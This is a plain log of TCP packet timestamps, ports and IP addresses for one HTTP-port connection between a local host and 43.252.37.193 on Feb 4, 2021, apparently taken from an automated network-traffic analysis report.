Feb 4, 2021 09:05:26.618369102 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:26.619698048 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:26.619817972 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:26.814946890 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:26.815166950 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:26.815289974 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:26.815321922 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:26.815427065 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:26.816426039 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:26.816462994 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:26.816561937 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:27.012336969 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.012383938 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.012432098 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:27.012825012 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:27.013099909 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.013139963 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.013175011 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:27.013205051 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:27.209263086 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.209295034 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.209553003 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:27.209752083 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.209773064 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.209853888 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:27.406327963 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.406379938 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.406433105 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.406476974 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.406516075 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.406553984 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.406642914 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:27.406706095 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:27.604083061 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.604113102 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.604129076 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.604144096 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.604163885 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.604181051 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.604271889 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:27.604306936 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:27.801176071 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.801202059 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.801218987 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.801234007 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.801253080 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.801270008 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.801384926 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:27.802891016 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:27.998178959 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.998204947 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.998217106 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.998229980 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.998241901 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.998451948 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:27.999712944 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:27.999733925 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.000154018 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:28.195280075 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.195302010 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.195314884 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.195327044 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.195343971 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.195360899 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.195512056 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:28.197010040 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.197043896 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.197154999 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:28.392216921 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.392245054 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.392262936 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.392275095 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.392292023 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.392308950 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.392369032 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:28.392885923 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:28.393810987 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.393847942 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.393882990 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:28.393908978 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:28.589556932 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.589587927 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.589606047 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.589621067 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.589637041 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.589636087 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:28.589652061 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.589674950 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:28.589679956 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:28.589693069 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:28.590586901 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.590606928 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.590650082 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:28.590673923 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:28.786724091 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.786783934 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.786834955 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.786881924 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.786922932 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.786967993 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.787144899 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:28.787734985 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.787781000 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.787856102 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:28.984369040 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.984400988 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.984422922 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.984438896 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.984636068 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:28.984694004 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.984715939 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.984771013 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.984797001 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.984877110 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:28.984918118 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:28.984929085 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:28.984940052 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:28.985455990 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:28.985543013 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.182034016 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.182116032 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.182177067 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.182179928 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.182235956 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.182236910 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.182272911 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.182295084 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.182302952 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.182349920 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.182356119 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.182414055 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.182421923 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.182468891 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.379977942 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.380007982 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.380223036 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.380266905 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.380414963 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.380435944 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.380495071 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.380507946 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.380678892 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.380701065 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.380726099 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.380800009 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.380841017 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.380863905 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.383008957 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.577023029 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.577053070 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.577066898 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.577264071 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.577318907 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.577399969 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.577774048 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.577799082 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.577815056 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.577835083 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.577913046 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.578830957 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.774233103 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.774262905 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.774279118 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.774296999 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.774312973 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.774317980 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.774358988 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.774362087 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.774846077 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.774866104 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.774883032 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.774894953 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.774914026 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.774938107 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.775188923 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.775635004 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.973215103 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.973246098 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.973258972 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.973272085 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.973284960 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.973304033 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.973443985 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.973464012 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:29.973614931 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:29.973659039 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.172188044 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.172218084 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.172230959 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.172243118 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.172261000 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.172272921 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.172293901 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.172312021 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.172444105 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.172631979 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.173726082 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.173795938 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.173816919 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.370471954 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.370556116 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.370609999 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.370651960 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.370687962 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.370716095 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.370815992 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.370841026 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.370842934 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.370857000 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.370858908 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.370861053 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.370961905 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.371027946 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.371072054 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.371218920 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.371454954 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.371550083 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.568375111 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.568417072 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.568435907 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.568466902 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.568492889 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.568646908 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.568681002 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.568878889 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.568905115 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.568957090 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.568967104 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.765348911 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.765552044 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.765676022 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.765707970 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.765736103 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.765741110 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.765760899 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.765764952 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.765780926 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.765794992 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.765820026 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.765822887 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.765852928 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.765866995 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.765878916 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.765887022 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.962668896 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.962707043 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.962721109 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.962733984 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.962799072 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.962867022 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.962883949 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.962930918 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.962982893 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.963009119 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:30.963037968 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.963048935 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.963062048 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:30.964330912 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.159791946 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.159882069 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.159898996 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.159910917 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.159918070 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.159935951 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.159951925 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.159970045 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.159986019 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.160005093 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.160022974 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.160073996 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.160104036 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.162041903 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.358586073 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.358623028 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.358647108 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.358669043 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.358694077 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.358717918 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.358740091 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.358762980 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.358786106 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.358808994 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.358844995 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.358891964 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.358899117 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.358903885 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.358907938 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.358912945 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.481873035 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.555463076 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.555500984 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.555567026 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.555582047 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.555591106 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.555613041 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.555634022 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.555636883 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.555664062 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.555686951 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.555691957 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.555715084 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.555715084 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.555732012 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.555759907 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.754221916 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.754251957 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.754265070 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.754281044 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.754293919 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.754306078 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.754324913 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.754364014 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.754415989 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.754467010 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.754473925 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.754479885 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.754484892 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.754489899 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.754493952 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.754498959 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.951292992 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.951330900 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.951356888 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.951380968 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.951406956 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.951455116 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.951467037 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.951489925 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.951493979 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.951507092 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.952501059 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:31.953598022 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:31.957380056 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.150899887 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.150940895 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.150965929 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.150981903 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.150988102 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:32.151006937 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:32.151010036 CET	49165	80	192.168.2.22	43.252.37.193
